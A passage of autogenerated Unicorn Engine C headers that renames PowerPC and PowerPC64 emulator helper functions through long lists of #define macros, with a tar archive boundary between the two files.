helper_vaddcuw_ppc #define helper_vprtybw helper_vprtybw_ppc #define helper_vprtybd helper_vprtybd_ppc #define helper_vprtybq helper_vprtybq_ppc #define helper_vmuluwm helper_vmuluwm_ppc #define helper_vaddfp helper_vaddfp_ppc #define helper_vsubfp helper_vsubfp_ppc #define helper_vminfp helper_vminfp_ppc #define helper_vmaxfp helper_vmaxfp_ppc #define helper_vmaddfp helper_vmaddfp_ppc #define helper_vnmsubfp helper_vnmsubfp_ppc #define helper_vaddsbs helper_vaddsbs_ppc #define helper_vsubsbs helper_vsubsbs_ppc #define helper_vsubshs helper_vsubshs_ppc #define helper_vaddsws helper_vaddsws_ppc #define helper_vsubsws helper_vsubsws_ppc #define helper_vaddubs helper_vaddubs_ppc #define helper_vsububs helper_vsububs_ppc #define helper_vadduhs helper_vadduhs_ppc #define helper_vsubuhs helper_vsubuhs_ppc #define helper_vadduws helper_vadduws_ppc #define helper_vsubuws helper_vsubuws_ppc #define helper_vavgsb helper_vavgsb_ppc #define helper_vavgub helper_vavgub_ppc #define helper_vavgsh helper_vavgsh_ppc #define helper_vavguh helper_vavguh_ppc #define helper_vavgsw helper_vavgsw_ppc #define helper_vabsdub helper_vabsdub_ppc #define helper_vabsduh helper_vabsduh_ppc #define helper_vabsduw helper_vabsduw_ppc #define helper_vcfux helper_vcfux_ppc #define helper_vcfsx helper_vcfsx_ppc #define helper_vcmpequb helper_vcmpequb_ppc #define helper_vcmpequb_dot helper_vcmpequb_dot_ppc #define helper_vcmpequw helper_vcmpequw_ppc #define helper_vcmpequw_dot helper_vcmpequw_dot_ppc #define helper_vcmpequd helper_vcmpequd_ppc #define helper_vcmpequd_dot helper_vcmpequd_dot_ppc #define helper_vcmpgtub helper_vcmpgtub_ppc #define helper_vcmpgtub_dot helper_vcmpgtub_dot_ppc #define helper_vcmpgtuh helper_vcmpgtuh_ppc #define helper_vcmpgtuh_dot helper_vcmpgtuh_dot_ppc #define helper_vcmpgtuw helper_vcmpgtuw_ppc #define helper_vcmpgtuw_dot helper_vcmpgtuw_dot_ppc #define helper_vcmpgtud helper_vcmpgtud_ppc #define helper_vcmpgtud_dot helper_vcmpgtud_dot_ppc #define helper_vcmpgtud helper_vcmpgtud_ppc #define helper_vcmpgtud_dot helper_vcmpgtud_dot_ppc #define helper_vcmpgtsb helper_vcmpgtsb_ppc #define helper_vcmpgtsb_dot helper_vcmpgtsb_dot_ppc #define helper_vcmpgtsh helper_vcmpgtsh_ppc #define helper_vcmpgtsh_dot helper_vcmpgtsh_dot_ppc #define helper_vcmpgtsw helper_vcmpgtsw_ppc #define helper_vcmpgtsw_dot helper_vcmpgtsw_dot_ppc #define helper_vcmpgtsd helper_vcmpgtsd_ppc #define helper_vcmpgtsd_dot helper_vcmpgtsd_dot_ppc #define helper_vcmpnezb helper_vcmpnezb_ppc #define helper_vcmpnezb_dot helper_vcmpnezb_dot_ppc #define helper_vcmpnezb helper_vcmpnezb_ppc #define helper_vcmpnezb_dot helper_vcmpnezb_dot_ppc #define helper_vcmpnezw helper_vcmpnezw_ppc #define helper_vcmpnezw_dot helper_vcmpnezw_dot_ppc #define helper_vcmpneb helper_vcmpneb_ppc #define helper_vcmpneb_dot helper_vcmpneb_dot_ppc #define helper_vcmpneb helper_vcmpneb_ppc #define helper_vcmpneb_dot helper_vcmpneb_dot_ppc #define helper_vcmpneh helper_vcmpneh_ppc #define helper_vcmpneh_dot helper_vcmpneh_dot_ppc #define helper_vcmpnew helper_vcmpnew_ppc #define helper_vcmpnew_dot helper_vcmpnew_dot_ppc #define helper_vcmpeqfp helper_vcmpeqfp_ppc #define helper_vcmpeqfp_dot helper_vcmpeqfp_dot_ppc #define helper_vcmpgefp helper_vcmpgefp_ppc #define helper_vcmpgefp_dot helper_vcmpgefp_dot_ppc #define helper_vcmpgtfp helper_vcmpgtfp_ppc #define helper_vcmpgtfp_dot helper_vcmpgtfp_dot_ppc #define helper_vcmpbfp helper_vcmpbfp_ppc #define helper_vcmpbfp_dot helper_vcmpbfp_dot_ppc #define helper_vcmpbfp helper_vcmpbfp_ppc #define helper_vcmpbfp_dot helper_vcmpbfp_dot_ppc #define helper_vctuxs helper_vctuxs_ppc #define helper_vctsxs helper_vctsxs_ppc #define helper_vclzlsbb helper_vclzlsbb_ppc #define helper_vctzlsbb helper_vctzlsbb_ppc #define helper_vmhaddshs helper_vmhaddshs_ppc #define helper_vmhraddshs helper_vmhraddshs_ppc #define helper_vmladduhm helper_vmladduhm_ppc #define helper_vmhraddshs helper_vmhraddshs_ppc #define helper_vmladduhm helper_vmladduhm_ppc #define helper_vmrglb helper_vmrglb_ppc #define helper_vmrghb helper_vmrghb_ppc #define helper_vmrglh helper_vmrglh_ppc #define helper_vmrghh helper_vmrghh_ppc #define helper_vmrglw helper_vmrglw_ppc #define helper_vmrghw helper_vmrghw_ppc #define helper_vmsummbm helper_vmsummbm_ppc #define helper_vmsumshs helper_vmsumshs_ppc #define helper_vmsumubm helper_vmsumubm_ppc #define helper_vmsumuhm helper_vmsumuhm_ppc #define helper_vmulesb helper_vmulesb_ppc #define helper_vmulosb helper_vmulosb_ppc #define helper_vmulesh helper_vmulesh_ppc #define helper_vmulesw helper_vmulesw_ppc #define helper_vmuleub helper_vmuleub_ppc #define helper_vmuloub helper_vmuloub_ppc #define helper_vmuleuh helper_vmuleuh_ppc #define helper_vmulouh helper_vmulouh_ppc #define helper_vmuleuw helper_vmuleuw_ppc #define helper_vmulouw helper_vmulouw_ppc #define helper_vperm helper_vperm_ppc #define helper_vpermr helper_vpermr_ppc #define helper_vbpermd helper_vbpermd_ppc #define helper_vpmsumb helper_vpmsumb_ppc #define helper_vpmsumh helper_vpmsumh_ppc #define helper_vpmsumw helper_vpmsumw_ppc #define helper_vpmsumd helper_vpmsumd_ppc #define helper_vpkpx helper_vpkpx_ppc #define helper_vpkshss helper_vpkshss_ppc #define helper_vpkshus helper_vpkshus_ppc #define helper_vpkswss helper_vpkswss_ppc #define helper_vpkswus helper_vpkswus_ppc #define helper_vpksdss helper_vpksdss_ppc #define helper_vpksdus helper_vpksdus_ppc #define helper_vpkuhus helper_vpkuhus_ppc #define helper_vpkuwus helper_vpkuwus_ppc #define helper_vpkudus helper_vpkudus_ppc #define helper_vpkuhum helper_vpkuhum_ppc #define helper_vpkuwum helper_vpkuwum_ppc #define helper_vpkudum helper_vpkudum_ppc #define helper_vrefp helper_vrefp_ppc #define helper_vrfin helper_vrfin_ppc #define helper_vrfim helper_vrfim_ppc #define helper_vrfip helper_vrfip_ppc #define helper_vrfiz helper_vrfiz_ppc #define helper_vrlb helper_vrlb_ppc #define helper_vrlh helper_vrlh_ppc #define helper_vrlw helper_vrlw_ppc #define helper_vrld helper_vrld_ppc #define helper_vrsqrtefp helper_vrsqrtefp_ppc #define helper_vrldmi helper_vrldmi_ppc #define helper_vrlwmi helper_vrlwmi_ppc #define helper_vrldnm helper_vrldnm_ppc #define helper_vrlwnm helper_vrlwnm_ppc #define helper_vsel helper_vsel_ppc #define helper_vexptefp helper_vexptefp_ppc #define helper_vlogefp helper_vlogefp_ppc #define helper_vextublx helper_vextublx_ppc #define helper_vextuhlx helper_vextuhlx_ppc #define helper_vextuwlx helper_vextuwlx_ppc #define helper_vextubrx helper_vextubrx_ppc #define helper_vextuhrx helper_vextuhrx_ppc #define helper_vextuwrx helper_vextuwrx_ppc #define helper_vslv helper_vslv_ppc #define helper_vsrv helper_vsrv_ppc #define helper_vsldoi helper_vsldoi_ppc #define helper_vslo helper_vslo_ppc #define helper_vinsertb helper_vinsertb_ppc #define helper_vinserth helper_vinserth_ppc #define helper_vinsertw helper_vinsertw_ppc #define helper_vinsertd helper_vinsertd_ppc #define helper_vextractub helper_vextractub_ppc #define helper_vextractuh helper_vextractuh_ppc #define helper_vextractuw helper_vextractuw_ppc #define helper_vextractd helper_vextractd_ppc #define helper_xxextractuw helper_xxextractuw_ppc #define helper_xxinsertw helper_xxinsertw_ppc #define helper_vextsb2w helper_vextsb2w_ppc #define helper_vextsb2d helper_vextsb2d_ppc #define helper_vextsh2w helper_vextsh2w_ppc #define helper_vextsh2d helper_vextsh2d_ppc #define helper_vnegw helper_vnegw_ppc #define helper_vnegd helper_vnegd_ppc #define helper_vsro helper_vsro_ppc #define helper_vsubcuw helper_vsubcuw_ppc #define helper_vsumsws helper_vsumsws_ppc #define helper_vsum2sws helper_vsum2sws_ppc #define helper_vsum4sbs helper_vsum4sbs_ppc #define helper_vsum4shs helper_vsum4shs_ppc #define helper_vsum4ubs helper_vsum4ubs_ppc #define helper_vupklpx helper_vupklpx_ppc #define helper_vupkhpx helper_vupkhpx_ppc #define helper_vupkhsb helper_vupkhsb_ppc #define helper_vupkhsh helper_vupkhsh_ppc #define helper_vupkhsw helper_vupkhsw_ppc #define helper_vupklsb helper_vupklsb_ppc #define helper_vupklsh helper_vupklsh_ppc #define helper_vupklsw helper_vupklsw_ppc #define helper_vclzb helper_vclzb_ppc #define helper_vclzh helper_vclzh_ppc #define helper_vctzb helper_vctzb_ppc #define helper_vctzh helper_vctzh_ppc #define helper_vctzw helper_vctzw_ppc #define helper_vctzd helper_vctzd_ppc #define helper_vpopcntb helper_vpopcntb_ppc #define helper_vpopcnth helper_vpopcnth_ppc #define helper_vpopcntw helper_vpopcntw_ppc #define helper_vpopcntd helper_vpopcntd_ppc #define helper_vadduqm helper_vadduqm_ppc #define helper_vaddeuqm helper_vaddeuqm_ppc #define helper_vaddcuq helper_vaddcuq_ppc #define helper_vaddecuq helper_vaddecuq_ppc #define helper_vsubuqm helper_vsubuqm_ppc #define helper_vsubeuqm helper_vsubeuqm_ppc #define helper_vsubcuq helper_vsubcuq_ppc #define helper_vsubecuq helper_vsubecuq_ppc #define helper_bcdadd helper_bcdadd_ppc #define helper_bcdsub helper_bcdsub_ppc #define helper_bcdcfn helper_bcdcfn_ppc #define helper_bcdctn helper_bcdctn_ppc #define helper_bcdcfz helper_bcdcfz_ppc #define helper_bcdctz helper_bcdctz_ppc #define helper_bcdcfsq helper_bcdcfsq_ppc #define helper_bcdctsq helper_bcdctsq_ppc #define helper_bcdcpsgn helper_bcdcpsgn_ppc #define helper_bcdsetsgn helper_bcdsetsgn_ppc #define helper_bcds helper_bcds_ppc #define helper_bcdus helper_bcdus_ppc #define helper_bcdsr helper_bcdsr_ppc #define helper_bcdtrunc helper_bcdtrunc_ppc #define helper_bcdutrunc helper_bcdutrunc_ppc #define helper_vsbox helper_vsbox_ppc #define helper_vcipher helper_vcipher_ppc #define helper_vcipherlast helper_vcipherlast_ppc #define helper_vncipher helper_vncipher_ppc #define helper_vncipherlast helper_vncipherlast_ppc #define helper_vshasigmaw helper_vshasigmaw_ppc #define helper_vshasigmad helper_vshasigmad_ppc #define helper_vpermxor helper_vpermxor_ppc #define helper_brinc helper_brinc_ppc #define helper_cntlsw32 helper_cntlsw32_ppc #define helper_cntlzw32 helper_cntlzw32_ppc #define helper_dlmzb helper_dlmzb_ppc #define helper_lmw helper_lmw_ppc #define helper_lsw helper_lsw_ppc #define helper_lswx helper_lswx_ppc #define helper_stsw helper_stsw_ppc #define helper_dcbz helper_dcbz_ppc #define helper_dcbzep helper_dcbzep_ppc #define helper_icbi helper_icbi_ppc #define helper_icbiep helper_icbiep_ppc #define helper_lscbx helper_lscbx_ppc #define helper_lvebx helper_lvebx_ppc #define helper_lvehx helper_lvehx_ppc #define helper_lvewx helper_lvewx_ppc #define helper_stvebx helper_stvebx_ppc #define helper_stvehx helper_stvehx_ppc #define helper_stvewx helper_stvewx_ppc #define helper_tbegin helper_tbegin_ppc #define helper_load_dump_spr helper_load_dump_spr_ppc #define helper_store_dump_spr helper_store_dump_spr_ppc #define helper_hfscr_facility_check helper_hfscr_facility_check_ppc #define helper_fscr_facility_check helper_fscr_facility_check_ppc #define helper_msr_facility_check helper_msr_facility_check_ppc #define helper_store_sdr1 helper_store_sdr1_ppc #define helper_store_pidr helper_store_pidr_ppc #define helper_store_lpidr helper_store_lpidr_ppc #define helper_store_hid0_601 helper_store_hid0_601_ppc #define helper_store_403_pbr helper_store_403_pbr_ppc #define helper_store_40x_dbcr0 helper_store_40x_dbcr0_ppc #define helper_store_40x_sler helper_store_40x_sler_ppc #define helper_clcs helper_clcs_ppc #define ppc_store_msr ppc_store_msr_ppc #define helper_fixup_thrm helper_fixup_thrm_ppc #define store_40x_sler store_40x_sler_ppc #define dump_mmu dump_mmu_ppc #define ppc_cpu_get_phys_page_debug ppc_cpu_get_phys_page_debug_ppc #define helper_store_ibatu helper_store_ibatu_ppc #define helper_store_ibatl helper_store_ibatl_ppc #define helper_store_dbatu helper_store_dbatu_ppc #define helper_store_dbatl helper_store_dbatl_ppc #define helper_store_601_batu helper_store_601_batu_ppc #define helper_store_601_batl helper_store_601_batl_ppc #define ppc_tlb_invalidate_all ppc_tlb_invalidate_all_ppc #define ppc_tlb_invalidate_one ppc_tlb_invalidate_one_ppc #define ppc_store_sdr1 ppc_store_sdr1_ppc #define helper_load_sr helper_load_sr_ppc #define helper_store_sr helper_store_sr_ppc #define helper_tlbia helper_tlbia_ppc #define helper_tlbie helper_tlbie_ppc #define helper_tlbiva helper_tlbiva_ppc #define helper_6xx_tlbd helper_6xx_tlbd_ppc #define helper_6xx_tlbi helper_6xx_tlbi_ppc #define helper_74xx_tlbd helper_74xx_tlbd_ppc #define helper_74xx_tlbi helper_74xx_tlbi_ppc #define helper_rac helper_rac_ppc #define helper_4xx_tlbre_hi helper_4xx_tlbre_hi_ppc #define helper_4xx_tlbre_lo helper_4xx_tlbre_lo_ppc #define helper_4xx_tlbwe_hi helper_4xx_tlbwe_hi_ppc #define helper_4xx_tlbwe_lo helper_4xx_tlbwe_lo_ppc #define helper_4xx_tlbsx helper_4xx_tlbsx_ppc #define helper_440_tlbwe helper_440_tlbwe_ppc #define helper_440_tlbre helper_440_tlbre_ppc #define helper_440_tlbsx helper_440_tlbsx_ppc #define helper_booke_setpid helper_booke_setpid_ppc #define helper_booke_set_eplc helper_booke_set_eplc_ppc #define helper_booke_set_epsc helper_booke_set_epsc_ppc #define helper_booke206_tlbwe helper_booke206_tlbwe_ppc #define helper_booke206_tlbre helper_booke206_tlbre_ppc #define helper_booke206_tlbsx helper_booke206_tlbsx_ppc #define helper_booke206_tlbivax helper_booke206_tlbivax_ppc #define helper_booke206_tlbilx0 helper_booke206_tlbilx0_ppc #define helper_booke206_tlbilx1 helper_booke206_tlbilx1_ppc #define helper_booke206_tlbilx3 helper_booke206_tlbilx3_ppc #define helper_booke206_tlbflush helper_booke206_tlbflush_ppc #define helper_check_tlb_flush_local helper_check_tlb_flush_local_ppc #define helper_check_tlb_flush_global helper_check_tlb_flush_global_ppc #define ppc_cpu_tlb_fill ppc_cpu_tlb_fill_ppc #define helper_load_tbl helper_load_tbl_ppc #define helper_load_tbu helper_load_tbu_ppc #define helper_load_atbl helper_load_atbl_ppc #define helper_load_atbu helper_load_atbu_ppc #define helper_load_vtb helper_load_vtb_ppc #define helper_load_601_rtcl helper_load_601_rtcl_ppc #define helper_load_601_rtcu helper_load_601_rtcu_ppc #define helper_store_tbl helper_store_tbl_ppc #define helper_store_tbu helper_store_tbu_ppc #define helper_store_atbl helper_store_atbl_ppc #define helper_store_atbu helper_store_atbu_ppc #define helper_store_601_rtcl helper_store_601_rtcl_ppc #define helper_store_601_rtcu helper_store_601_rtcu_ppc #define helper_load_decr helper_load_decr_ppc #define helper_store_decr helper_store_decr_ppc #define helper_load_hdecr helper_load_hdecr_ppc #define helper_store_hdecr helper_store_hdecr_ppc #define helper_store_vtb helper_store_vtb_ppc #define helper_store_tbu40 helper_store_tbu40_ppc #define helper_load_40x_pit helper_load_40x_pit_ppc #define helper_store_40x_pit helper_store_40x_pit_ppc #define helper_store_booke_tcr helper_store_booke_tcr_ppc #define helper_store_booke_tsr helper_store_booke_tsr_ppc #define helper_load_dcr helper_load_dcr_ppc #define helper_store_dcr helper_store_dcr_ppc #define helper_raise_exception helper_raise_exception_ppc #define helper_book3s_msgsnd helper_book3s_msgsnd_ppc #define helper_cmpb helper_cmpb_ppc #define helper_mfvscr helper_mfvscr_ppc #define helper_vaddshs helper_vaddshs_ppc #define helper_vavguw helper_vavguw_ppc #define helper_vcmpequh helper_vcmpequh_ppc #define helper_vcmpequh_dot helper_vcmpequh_dot_ppc #define helper_vcmpnezh helper_vcmpnezh_ppc #define helper_vcmpnezh_dot helper_vcmpnezh_dot_ppc #define helper_vmsumshm helper_vmsumshm_ppc #define helper_vmsumuhs helper_vmsumuhs_ppc #define helper_vmulosh helper_vmulosh_ppc #define helper_vmulosw helper_vmulosw_ppc #define helper_vbpermq helper_vbpermq_ppc #define helper_vextsw2d helper_vextsw2d_ppc #define helper_stmw helper_stmw_ppc #define ppc_translate_init ppc_translate_init_ppc #define cpu_ppc_init cpu_ppc_init_ppc #define gen_intermediate_code gen_intermediate_code_ppc #define restore_state_to_opc restore_state_to_opc_ppc #define ppc_set_irq ppc_set_irq_ppc #define ppc6xx_irq_init ppc6xx_irq_init_ppc #define ppc40x_core_reset ppc40x_core_reset_ppc #define ppc40x_chip_reset ppc40x_chip_reset_ppc #define ppc40x_system_reset ppc40x_system_reset_ppc #define store_40x_dbcr0 store_40x_dbcr0_ppc #define ppc40x_irq_init ppc40x_irq_init_ppc #define ppce500_irq_init ppce500_irq_init_ppc #define ppce500_set_mpic_proxy ppce500_set_mpic_proxy_ppc #define cpu_ppc_get_tb cpu_ppc_get_tb_ppc #define cpu_ppc_load_tbl cpu_ppc_load_tbl_ppc #define cpu_ppc_load_tbu cpu_ppc_load_tbu_ppc #define cpu_ppc_store_tbl cpu_ppc_store_tbl_ppc #define cpu_ppc_store_tbu cpu_ppc_store_tbu_ppc #define cpu_ppc_load_atbl cpu_ppc_load_atbl_ppc #define cpu_ppc_load_atbu cpu_ppc_load_atbu_ppc #define cpu_ppc_store_atbl cpu_ppc_store_atbl_ppc #define cpu_ppc_store_atbu cpu_ppc_store_atbu_ppc #define cpu_ppc_load_vtb cpu_ppc_load_vtb_ppc #define cpu_ppc_store_vtb cpu_ppc_store_vtb_ppc #define cpu_ppc_store_tbu40 cpu_ppc_store_tbu40_ppc #define ppc_decr_clear_on_delivery ppc_decr_clear_on_delivery_ppc #define cpu_ppc_load_decr cpu_ppc_load_decr_ppc #define cpu_ppc_load_hdecr cpu_ppc_load_hdecr_ppc #define cpu_ppc_load_purr cpu_ppc_load_purr_ppc #define cpu_ppc_store_decr cpu_ppc_store_decr_ppc #define cpu_ppc_store_hdecr cpu_ppc_store_hdecr_ppc #define cpu_ppc_store_purr cpu_ppc_store_purr_ppc #define cpu_ppc_tb_init cpu_ppc_tb_init_ppc #define cpu_ppc601_load_rtcu cpu_ppc601_load_rtcu_ppc #define cpu_ppc601_store_rtcu cpu_ppc601_store_rtcu_ppc #define cpu_ppc601_load_rtcl cpu_ppc601_load_rtcl_ppc #define cpu_ppc601_store_rtcl cpu_ppc601_store_rtcl_ppc #define load_40x_pit load_40x_pit_ppc #define store_40x_pit store_40x_pit_ppc #define ppc_40x_timers_init ppc_40x_timers_init_ppc #define ppc_dcr_read ppc_dcr_read_ppc #define ppc_dcr_write ppc_dcr_write_ppc #define ppc_dcr_register ppc_dcr_register_ppc #define ppc_dcr_init ppc_dcr_init_ppc #define ppc_cpu_pir ppc_cpu_pir_ppc #define ppc_irq_reset ppc_irq_reset_ppc #define store_booke_tsr store_booke_tsr_ppc #define get_pteg_offset32 get_pteg_offset32_ppc #define ppc_booke_timers_init ppc_booke_timers_init_ppc #define ppc_hash32_handle_mmu_fault ppc_hash32_handle_mmu_fault_ppc #define gen_helper_store_booke_tsr gen_helper_store_booke_tsr_ppc #define gen_helper_store_booke_tcr gen_helper_store_booke_tcr_ppc #define store_booke_tcr store_booke_tcr_ppc #define ppc_hash32_get_phys_page_debug ppc_hash32_get_phys_page_debug_ppc #endif ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/ppc64.h��������������������������������������������������������������������������0000664�0000000�0000000�00000266104�14675241067�0015271�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Autogen header for Unicorn Engine - DONOT MODIFY */ #ifndef UNICORN_AUTOGEN_ppc64_H #define UNICORN_AUTOGEN_ppc64_H #ifndef UNICORN_ARCH_POSTFIX #define UNICORN_ARCH_POSTFIX _ppc64 #endif #define unicorn_fill_tlb unicorn_fill_tlb_ppc64 #define reg_read reg_read_ppc64 #define reg_write reg_write_ppc64 #define uc_init uc_init_ppc64 #define uc_add_inline_hook uc_add_inline_hook_ppc64 #define uc_del_inline_hook uc_del_inline_hook_ppc64 #define tb_invalidate_phys_range tb_invalidate_phys_range_ppc64 #define use_idiv_instructions use_idiv_instructions_ppc64 #define arm_arch arm_arch_ppc64 #define tb_target_set_jmp_target tb_target_set_jmp_target_ppc64 #define have_bmi1 have_bmi1_ppc64 #define have_popcnt have_popcnt_ppc64 #define have_avx1 have_avx1_ppc64 #define have_avx2 have_avx2_ppc64 #define have_isa have_isa_ppc64 #define have_altivec have_altivec_ppc64 #define have_vsx have_vsx_ppc64 #define flush_icache_range flush_icache_range_ppc64 #define s390_facilities s390_facilities_ppc64 #define tcg_dump_op tcg_dump_op_ppc64 #define tcg_dump_ops tcg_dump_ops_ppc64 #define tcg_gen_and_i64 tcg_gen_and_i64_ppc64 #define tcg_gen_discard_i64 tcg_gen_discard_i64_ppc64 #define tcg_gen_ld16s_i64 tcg_gen_ld16s_i64_ppc64 #define tcg_gen_ld16u_i64 tcg_gen_ld16u_i64_ppc64 #define tcg_gen_ld32s_i64 tcg_gen_ld32s_i64_ppc64 #define tcg_gen_ld32u_i64 tcg_gen_ld32u_i64_ppc64 #define tcg_gen_ld8s_i64 tcg_gen_ld8s_i64_ppc64 #define tcg_gen_ld8u_i64 tcg_gen_ld8u_i64_ppc64 #define tcg_gen_ld_i64 tcg_gen_ld_i64_ppc64 #define tcg_gen_mov_i64 tcg_gen_mov_i64_ppc64 #define tcg_gen_movi_i64 tcg_gen_movi_i64_ppc64 #define tcg_gen_mul_i64 tcg_gen_mul_i64_ppc64 #define tcg_gen_or_i64 tcg_gen_or_i64_ppc64 #define tcg_gen_sar_i64 tcg_gen_sar_i64_ppc64 #define tcg_gen_shl_i64 tcg_gen_shl_i64_ppc64 #define tcg_gen_shr_i64 tcg_gen_shr_i64_ppc64 #define tcg_gen_st_i64 tcg_gen_st_i64_ppc64 #define tcg_gen_xor_i64 tcg_gen_xor_i64_ppc64 #define cpu_icount_to_ns cpu_icount_to_ns_ppc64 #define cpu_is_stopped cpu_is_stopped_ppc64 #define cpu_get_ticks cpu_get_ticks_ppc64 #define cpu_get_clock cpu_get_clock_ppc64 #define cpu_resume cpu_resume_ppc64 #define qemu_init_vcpu qemu_init_vcpu_ppc64 #define cpu_stop_current cpu_stop_current_ppc64 #define resume_all_vcpus resume_all_vcpus_ppc64 #define vm_start vm_start_ppc64 #define address_space_dispatch_compact address_space_dispatch_compact_ppc64 #define flatview_translate flatview_translate_ppc64 #define address_space_translate_for_iotlb address_space_translate_for_iotlb_ppc64 #define qemu_get_cpu qemu_get_cpu_ppc64 #define cpu_address_space_init cpu_address_space_init_ppc64 #define cpu_get_address_space cpu_get_address_space_ppc64 #define cpu_exec_unrealizefn cpu_exec_unrealizefn_ppc64 #define cpu_exec_initfn cpu_exec_initfn_ppc64 #define cpu_exec_realizefn cpu_exec_realizefn_ppc64 #define tb_invalidate_phys_addr tb_invalidate_phys_addr_ppc64 #define cpu_watchpoint_insert cpu_watchpoint_insert_ppc64 #define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_ppc64 #define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_ppc64 #define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_ppc64 #define cpu_breakpoint_insert cpu_breakpoint_insert_ppc64 #define cpu_breakpoint_remove cpu_breakpoint_remove_ppc64 #define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_ppc64 #define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_ppc64 #define cpu_abort cpu_abort_ppc64 #define cpu_physical_memory_test_and_clear_dirty cpu_physical_memory_test_and_clear_dirty_ppc64 #define memory_region_section_get_iotlb memory_region_section_get_iotlb_ppc64 #define flatview_add_to_dispatch flatview_add_to_dispatch_ppc64 #define qemu_ram_get_host_addr qemu_ram_get_host_addr_ppc64 #define qemu_ram_get_offset qemu_ram_get_offset_ppc64 #define qemu_ram_get_used_length qemu_ram_get_used_length_ppc64 #define qemu_ram_is_shared qemu_ram_is_shared_ppc64 #define qemu_ram_pagesize qemu_ram_pagesize_ppc64 #define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_ppc64 #define qemu_ram_alloc qemu_ram_alloc_ppc64 #define qemu_ram_free qemu_ram_free_ppc64 #define qemu_map_ram_ptr qemu_map_ram_ptr_ppc64 #define qemu_ram_block_host_offset qemu_ram_block_host_offset_ppc64 #define qemu_ram_block_from_host qemu_ram_block_from_host_ppc64 #define qemu_ram_addr_from_host qemu_ram_addr_from_host_ppc64 #define cpu_check_watchpoint cpu_check_watchpoint_ppc64 #define iotlb_to_section iotlb_to_section_ppc64 #define address_space_dispatch_new address_space_dispatch_new_ppc64 #define address_space_dispatch_free address_space_dispatch_free_ppc64 #define flatview_read_continue flatview_read_continue_ppc64 #define address_space_read_full address_space_read_full_ppc64 #define address_space_write address_space_write_ppc64 #define address_space_rw address_space_rw_ppc64 #define cpu_physical_memory_rw cpu_physical_memory_rw_ppc64 #define address_space_write_rom address_space_write_rom_ppc64 #define cpu_flush_icache_range cpu_flush_icache_range_ppc64 #define cpu_exec_init_all cpu_exec_init_all_ppc64 #define address_space_access_valid address_space_access_valid_ppc64 #define address_space_map address_space_map_ppc64 #define address_space_unmap address_space_unmap_ppc64 #define cpu_physical_memory_map cpu_physical_memory_map_ppc64 #define cpu_physical_memory_unmap cpu_physical_memory_unmap_ppc64 #define cpu_memory_rw_debug cpu_memory_rw_debug_ppc64 #define qemu_target_page_size qemu_target_page_size_ppc64 #define qemu_target_page_bits qemu_target_page_bits_ppc64 #define qemu_target_page_bits_min qemu_target_page_bits_min_ppc64 #define target_words_bigendian target_words_bigendian_ppc64 #define cpu_physical_memory_is_io cpu_physical_memory_is_io_ppc64 #define ram_block_discard_range ram_block_discard_range_ppc64 #define ramblock_is_pmem ramblock_is_pmem_ppc64 #define page_size_init page_size_init_ppc64 #define set_preferred_target_page_bits set_preferred_target_page_bits_ppc64 #define finalize_target_page_bits finalize_target_page_bits_ppc64 #define cpu_outb cpu_outb_ppc64 #define cpu_outw cpu_outw_ppc64 #define cpu_outl cpu_outl_ppc64 #define cpu_inb cpu_inb_ppc64 #define cpu_inw cpu_inw_ppc64 #define cpu_inl cpu_inl_ppc64 #define memory_map memory_map_ppc64 #define memory_map_io memory_map_io_ppc64 #define memory_map_ptr memory_map_ptr_ppc64 #define memory_cow memory_cow_ppc64 #define memory_unmap memory_unmap_ppc64 #define memory_moveout memory_moveout_ppc64 #define memory_movein memory_movein_ppc64 #define memory_free memory_free_ppc64 #define flatview_unref flatview_unref_ppc64 #define address_space_get_flatview address_space_get_flatview_ppc64 #define memory_region_transaction_begin memory_region_transaction_begin_ppc64 #define memory_region_transaction_commit memory_region_transaction_commit_ppc64 #define memory_region_init memory_region_init_ppc64 #define memory_region_access_valid memory_region_access_valid_ppc64 #define memory_region_dispatch_read memory_region_dispatch_read_ppc64 #define memory_region_dispatch_write memory_region_dispatch_write_ppc64 #define memory_region_init_io memory_region_init_io_ppc64 #define memory_region_init_ram_ptr memory_region_init_ram_ptr_ppc64 #define memory_region_size memory_region_size_ppc64 #define memory_region_set_readonly memory_region_set_readonly_ppc64 #define memory_region_get_ram_ptr memory_region_get_ram_ptr_ppc64 #define memory_region_from_host memory_region_from_host_ppc64 #define memory_region_get_ram_addr memory_region_get_ram_addr_ppc64 #define memory_region_add_subregion memory_region_add_subregion_ppc64 #define memory_region_del_subregion memory_region_del_subregion_ppc64 #define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_ppc64 #define memory_region_find memory_region_find_ppc64 #define memory_region_filter_subregions memory_region_filter_subregions_ppc64 #define memory_listener_register memory_listener_register_ppc64 #define memory_listener_unregister memory_listener_unregister_ppc64 #define address_space_remove_listeners address_space_remove_listeners_ppc64 #define address_space_init address_space_init_ppc64 #define address_space_destroy address_space_destroy_ppc64 #define memory_region_init_ram memory_region_init_ram_ppc64 #define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_ppc64 #define find_memory_mapping find_memory_mapping_ppc64 #define exec_inline_op exec_inline_op_ppc64 #define floatx80_default_nan floatx80_default_nan_ppc64 #define float_raise float_raise_ppc64 #define float16_is_quiet_nan float16_is_quiet_nan_ppc64 #define float16_is_signaling_nan float16_is_signaling_nan_ppc64 #define float32_is_quiet_nan float32_is_quiet_nan_ppc64 #define float32_is_signaling_nan float32_is_signaling_nan_ppc64 #define float64_is_quiet_nan float64_is_quiet_nan_ppc64 #define float64_is_signaling_nan float64_is_signaling_nan_ppc64 #define floatx80_is_quiet_nan floatx80_is_quiet_nan_ppc64 #define floatx80_is_signaling_nan floatx80_is_signaling_nan_ppc64 #define floatx80_silence_nan floatx80_silence_nan_ppc64 #define propagateFloatx80NaN propagateFloatx80NaN_ppc64 #define float128_is_quiet_nan float128_is_quiet_nan_ppc64 #define float128_is_signaling_nan float128_is_signaling_nan_ppc64 #define float128_silence_nan float128_silence_nan_ppc64 #define float16_add float16_add_ppc64 #define float16_sub float16_sub_ppc64 #define float32_add 